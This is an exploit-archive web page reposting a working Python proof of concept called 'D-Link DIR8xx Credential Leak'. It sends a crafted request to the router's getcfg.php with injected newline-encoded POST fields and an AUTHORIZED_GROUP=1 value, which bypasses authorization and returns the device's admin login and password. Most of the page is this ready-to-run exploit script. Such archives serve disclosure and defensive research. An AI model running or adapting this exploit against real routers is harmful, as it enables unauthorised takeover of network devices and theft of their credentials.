Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017090122

Below is a copy:

D-Link DIR8xx Credential Leak
# phpcgi is responsible for processing requests to .php, .asp and .txt pages. Also, it checks whether a user is authorized or not. Nevertheless, if a request is crafted in a proper way, an attacker can easily bypass authorization and execute a script that returns a login and password to a router.
 
import requests as rq
 
EQ = "%3d"
IP = "192.168.0.1"
PORT = "80"
 
def pair(key, value):
    return "%0a_POST_" + key + EQ + value
 
headers_multipart = {
    'CONTENT-TYPE' : 'application/x-www-form-urlencoded'
}
 
url = 'http://{ip}:{port}/getcfg.php'.format(ip=IP, port=PORT)
auth = "%0aAUTHORIZED_GROUP%3d1"
data = "A=A" + pair("SERVICES", "DEVICE.ACCOUNT") + auth
 
print(rq.get(url, data=data, headers=headers_multipart).text)


Copyright ©2019 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.